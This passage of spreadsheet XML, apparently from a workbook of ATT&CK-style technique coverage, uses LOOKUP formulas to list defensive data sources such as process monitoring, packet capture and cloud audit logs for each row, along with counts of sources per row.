        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="434" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A434" s="53" t="s">
        <v>2503</v>
      </c>
      <c r="B434" s="53" t="str">
        <f>LOOKUP(A434,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D434" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E434" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="435" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A435" s="53" t="s">
        <v>2507</v>
      </c>
      <c r="B435" s="53" t="str">
        <f>LOOKUP(A435,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D435" s="53">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="E435" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="436" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A436" s="53" t="s">
        <v>2511</v>
      </c>
      <c r="B436" s="53" t="str">
        <f>LOOKUP(A436,'REF-DataSources'!A:C)</f>
        <v>Environment variable,Loaded DLLs,Process command-line parameters,Process monitoring,File monitoring,DLL monitoring</v>
      </c>
      <c r="D436" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E436" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="437" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A437" s="53" t="s">
        <v>2517</v>
      </c>
      <c r="B437" s="53" t="str">
        <f>LOOKUP(A437,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,DLL monitoring,File monitoring</v>
      </c>
      <c r="D437" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E437" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="438" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A438" s="53" t="s">
        <v>2522</v>
      </c>
      <c r="B438" s="53" t="str">
        <f>LOOKUP(A438,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Process use of network</v>
      </c>
      <c r="D438" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E438" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="439" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A439" s="55" t="s">
        <v>2527</v>
      </c>
      <c r="B439" s="53" t="str">
        <f>LOOKUP(A439,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C439" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D439" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E439" s="53">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="440" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A440" s="53" t="s">
        <v>2531</v>
      </c>
      <c r="B440" s="53" t="str">
        <f>LOOKUP(A440,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring</v>
      </c>
      <c r="D440" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E440" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="441" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A441" s="53" t="s">
        <v>2535</v>
      </c>
      <c r="B441" s="53" t="str">
        <f>LOOKUP(A441,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Environment variable</v>
      </c>
      <c r="D441" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E441" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="442" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A442" s="55" t="s">
        <v>2540</v>
      </c>
      <c r="B442" s="53" t="str">
        <f>LOOKUP(A442,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C442" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D442" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E442" s="53">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="443" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A443" s="55" t="s">
        <v>2544</v>
      </c>
      <c r="B443" s="53" t="str">
        <f>LOOKUP(A443,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C443" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D443" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E443" s="53">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="444" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A444" s="55" t="s">
        <v>2548</v>
      </c>
      <c r="B444" s="53" t="str">
        <f>LOOKUP(A444,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C444" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D444" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E444" s="53">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="445" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A445" s="53" t="s">
        <v>2551</v>
      </c>
      <c r="B445" s="53" t="str">
        <f>LOOKUP(A445,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Services,File monitoring</v>
      </c>
      <c r="D445" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E445" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="446" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A446" s="53" t="s">
        <v>2556</v>
      </c>
      <c r="B446" s="53" t="str">
        <f>LOOKUP(A446,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Process command-line parameters</v>
      </c>
      <c r="D446" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E446" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="447" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A447" s="53" t="s">
        <v>2561</v>
      </c>
      <c r="B447" s="53" t="str">
        <f>LOOKUP(A447,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D447" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E447" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="448" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A448" s="53" t="s">
        <v>2566</v>
      </c>
      <c r="B448" s="53" t="str">
        <f>LOOKUP(A448,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D448" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E448" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="449" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A449" s="53" t="s">
        <v>2570</v>
      </c>
      <c r="B449" s="53" t="str">
        <f>LOOKUP(A449,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D449" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E449" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="450" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A450" s="53" t="s">
        <v>2575</v>
      </c>
      <c r="B450" s="53" t="str">
        <f>LOOKUP(A450,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D450" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E450" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="451" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A451" s="53" t="s">
        <v>2579</v>
      </c>
      <c r="B451" s="53" t="str">
        <f>LOOKUP(A451,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D451" s="53">
        <f t="shared" ref="D451:D514" si="15">LEN(TRIM(B451))-LEN(SUBSTITUTE(TRIM(B451),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E451" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="452" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A452" s="53" t="s">
        <v>2583</v>
      </c>
      <c r="B452" s="53" t="str">
        <f>LOOKUP(A452,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D452" s="53">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="E452" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="453" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A453" s="53" t="s">
        <v>2587</v>
      </c>
      <c r="B453" s="53" t="str">
        <f>LOOKUP(A453,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,AWS CloudTrail logs,Azure activity logs</v>
      </c>
      <c r="D453" s="53">
        <f t="shared" si="15"/>
        <v>4</v>
      </c>
      <c r="E453" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="454" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A454" s="55" t="s">
        <v>2593</v>
      </c>
      <c r="B454" s="53" t="str">
        <f>LOOKUP(A454,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C454" s="17">
        <v>0</v>
      </c>
      <c r="D454" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E454" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="455" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A455" s="55" t="s">
        <v>2599</v>
      </c>
      <c r="B455" s="53" t="str">
        <f>LOOKUP(A455,'REF-DataSources'!A:C)</f>
        <v>Domain registration</v>
      </c>
      <c r="C455" s="17">
        <v>100</v>
      </c>
      <c r="D455" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E455" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="456" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A456" s="55" t="s">
        <v>2604</v>
      </c>
      <c r="B456" s="53" t="str">
        <f>LOOKUP(A456,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C456" s="17">
        <v>0</v>
      </c>
      <c r="D456" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E456" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="457" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A457" s="55" t="s">
        <v>2608</v>
      </c>
      <c r="B457" s="53" t="str">
        <f>LOOKUP(A457,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C457" s="17">
        <v>0</v>
      </c>
      <c r="D457" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E457" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="458" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A458" s="55" t="s">
        <v>2611</v>
      </c>
      <c r="B458" s="53" t="str">
        <f>LOOKUP(A458,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C458" s="17">
        <v>0</v>
      </c>
      <c r="D458" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E458" s="53">
        <f t="shared" ref="E458:E521" si="16">LEN(TRIM(C458))-LEN(SUBSTITUTE(TRIM(C458),";",""))+1</f>
        <v>1</v>
      </c>
    </row>
    <row r="459" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A459" s="55" t="s">
        <v>2614</v>
      </c>
      <c r="B459" s="53" t="str">
        <f>LOOKUP(A459,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C459" s="17">
        <v>0</v>
      </c>
      <c r="D459" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E459" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="460" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A460" s="55" t="s">
        <v>2618</v>
      </c>
      <c r="B460" s="53" t="str">
        <f>LOOKUP(A460,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C460" s="17">
        <v>0</v>
      </c>
      <c r="D460" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E460" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="461" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A461" s="55" t="s">
        <v>2622</v>
      </c>
      <c r="B461" s="53" t="str">
        <f>LOOKUP(A461,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C461" s="17">
        <v>0</v>
      </c>
      <c r="D461" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E461" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="462" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A462" s="55" t="s">
        <v>2626</v>
      </c>
      <c r="B462" s="53" t="str">
        <f>LOOKUP(A462,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C462" s="17">
        <v>0</v>
      </c>
      <c r="D462" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E462" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="463" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A463" s="55" t="s">
        <v>2628</v>
      </c>
      <c r="B463" s="53" t="str">
        <f>LOOKUP(A463,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C463" s="17">
        <v>0</v>
      </c>
      <c r="D463" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E463" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="464" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A464" s="55" t="s">
        <v>2630</v>
      </c>
      <c r="B464" s="53" t="str">
        <f>LOOKUP(A464,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C464" s="17">
        <v>0</v>
      </c>
      <c r="D464" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E464" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="465" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A465" s="55" t="s">
        <v>2632</v>
      </c>
      <c r="B465" s="53" t="str">
        <f>LOOKUP(A465,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C465" s="17">
        <v>0</v>
      </c>
      <c r="D465" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E465" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="466" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A466" s="55" t="s">
        <v>2634</v>
      </c>
      <c r="B466" s="53" t="str">
        <f>LOOKUP(A466,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C466" s="17">
        <v>0</v>
      </c>
      <c r="D466" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E466" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="467" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A467" s="55" t="s">
        <v>2636</v>
      </c>
      <c r="B467" s="53" t="str">
        <f>LOOKUP(A467,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C467" s="17">
        <v>0</v>
      </c>
      <c r="D467" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E467" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="468" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A468" s="55" t="s">
        <v>2638</v>
      </c>
      <c r="B468" s="53" t="str">
        <f>LOOKUP(A468,'REF-DataSources'!A:C)</f>
        <v>Social media monitoring</v>
      </c>
      <c r="C468" s="17">
        <v>100</v>
      </c>
      <c r="D468" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E468" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="469" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A469" s="55" t="s">
        <v>2643</v>
      </c>
      <c r="B469" s="53" t="str">
        <f>LOOKUP(A469,'REF-DataSources'!A:C)</f>
        <v>Social media monitoring</v>
      </c>
      <c r="C469" s="17">
        <v>100</v>
      </c>
      <c r="D469" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E469" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="470" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A470" s="55" t="s">
        <v>2647</v>
      </c>
      <c r="B470" s="53" t="str">
        <f>LOOKUP(A470,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C470" s="17">
        <v>0</v>
      </c>
      <c r="D470" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E470" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="471" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A471" s="55" t="s">
        <v>2651</v>
      </c>
      <c r="B471" s="53" t="str">
        <f>LOOKUP(A471,'REF-DataSources'!A:C)</f>
        <v>Social media monitoring</v>
      </c>
      <c r="C471" s="56">
        <v>100</v>
      </c>
      <c r="D471" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E471" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="472" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A472" s="55" t="s">
        <v>2655</v>
      </c>
      <c r="B472" s="53" t="str">
        <f>LOOKUP(A472,'REF-DataSources'!A:C)</f>
        <v>Social media monitoring</v>
      </c>
      <c r="C472" s="56">
        <v>100</v>
      </c>
      <c r="D472" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E472" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="473" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A473" s="55" t="s">
        <v>2658</v>
      </c>
      <c r="B473" s="53" t="str">
        <f>LOOKUP(A473,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C473" s="17">
        <v>0</v>
      </c>
      <c r="D473" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E473" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="474" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A474" s="55" t="s">
        <v>2660</v>
      </c>
      <c r="B474" s="53" t="str">
        <f>LOOKUP(A474,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C474" s="17">
        <v>0</v>
      </c>
      <c r="D474" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E474" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="475" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A475" s="55" t="s">
        <v>2664</v>
      </c>
      <c r="B475" s="53" t="str">
        <f>LOOKUP(A475,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C475" s="17">
        <v>0</v>
      </c>
      <c r="D475" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E475" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="476" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A476" s="55" t="s">
        <v>2668</v>
      </c>
      <c r="B476" s="53" t="str">
        <f>LOOKUP(A476,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C476" s="17">
        <v>0</v>
      </c>
      <c r="D476" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E476" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="477" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A477" s="55" t="s">
        <v>2672</v>
      </c>
      <c r="B477" s="53" t="str">
        <f>LOOKUP(A477,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS certificates</v>
      </c>
      <c r="C477" s="56">
        <v>100</v>
      </c>
      <c r="D477" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E477" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="478" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A478" s="55" t="s">
        <v>2677</v>
      </c>
      <c r="B478" s="53" t="str">
        <f>LOOKUP(A478,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C478" s="17">
        <v>0</v>
      </c>
      <c r="D478" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E478" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="479" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A479" s="55" t="s">
        <v>2681</v>
      </c>
      <c r="B479" s="53" t="str">
        <f>LOOKUP(A479,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C479" s="17">
        <v>0</v>
      </c>
      <c r="D479" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E479" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="480" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A480" s="55" t="s">
        <v>2684</v>
      </c>
      <c r="B480" s="53" t="str">
        <f>LOOKUP(A480,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C480" s="17">
        <v>0</v>
      </c>
      <c r="D480" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E480" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="481" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A481" s="55" t="s">
        <v>2686</v>
      </c>
      <c r="B481" s="53" t="str">
        <f>LOOKUP(A481,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C481" s="17">
        <v>0</v>
      </c>
      <c r="D481" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E481" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="482" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A482" s="55" t="s">
        <v>2689</v>
      </c>
      <c r="B482" s="53" t="str">
        <f>LOOKUP(A482,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C482" s="17">
        <v>0</v>
      </c>
      <c r="D482" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E482" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="483" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A483" s="55" t="s">
        <v>2691</v>
      </c>
      <c r="B483" s="53" t="str">
        <f>LOOKUP(A483,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS certificates</v>
      </c>
      <c r="C483" s="56">
        <v>100</v>
      </c>
      <c r="D483" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E483" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="484" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A484" s="55" t="s">
        <v>2694</v>
      </c>
      <c r="B484" s="53" t="str">
        <f>LOOKUP(A484,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C484" s="17">
        <v>0</v>
      </c>
      <c r="D484" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E484" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="485" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A485" s="55" t="s">
        <v>2697</v>
      </c>
      <c r="B485" s="53" t="str">
        <f>LOOKUP(A485,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C485" s="17">
        <v>0</v>
      </c>
      <c r="D485" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E485" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="486" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A486" s="55" t="s">
        <v>2701</v>
      </c>
      <c r="B486" s="53" t="str">
        <f>LOOKUP(A486,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C486" s="17">
        <v>0</v>
      </c>
      <c r="D486" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E486" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="487" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A487" s="55" t="s">
        <v>2706</v>
      </c>
      <c r="B487" s="53" t="str">
        <f>LOOKUP(A487,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C487" s="17">
        <v>0</v>
      </c>
      <c r="D487" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E487" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="488" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A488" s="55" t="s">
        <v>2709</v>
      </c>
      <c r="B488" s="53" t="str">
        <f>LOOKUP(A488,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C488" s="17">
        <v>0</v>
      </c>
      <c r="D488" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E488" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="489" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A489" s="55" t="s">
        <v>2712</v>
      </c>
      <c r="B489" s="53" t="str">
        <f>LOOKUP(A489,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C489" s="17">
        <v>0</v>
      </c>
      <c r="D489" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E489" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="490" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A490" s="55" t="s">
        <v>2715</v>
      </c>
      <c r="B490" s="53" t="str">
        <f>LOOKUP(A490,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C490" s="17">
        <v>0</v>
      </c>
      <c r="D490" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E490" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="491" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A491" s="55" t="s">
        <v>2718</v>
      </c>
      <c r="B491" s="53" t="str">
        <f>LOOKUP(A491,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C491" s="17">
        <v>0</v>
      </c>
      <c r="D491" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E491" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="492" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A492" s="55" t="s">
        <v>2721</v>
      </c>
      <c r="B492" s="53" t="str">
        <f>LOOKUP(A492,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C492" s="17">
        <v>0</v>
      </c>
      <c r="D492" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E492" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="493" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A493" s="55" t="s">
        <v>2723</v>
      </c>
      <c r="B493" s="53" t="str">
        <f>LOOKUP(A493,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C493" s="17">
        <v>0</v>
      </c>
      <c r="D493" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E493" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="494" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A494" s="55" t="s">
        <v>2726</v>
      </c>
      <c r="B494" s="53" t="str">
        <f>LOOKUP(A494,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C494" s="17">
        <v>0</v>
      </c>
      <c r="D494" s="53">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="E494" s="53">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="495" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A495" s="55" t="s">
        <v>2729</v>
      </c>
      <c r="B495" s="53" t="str">
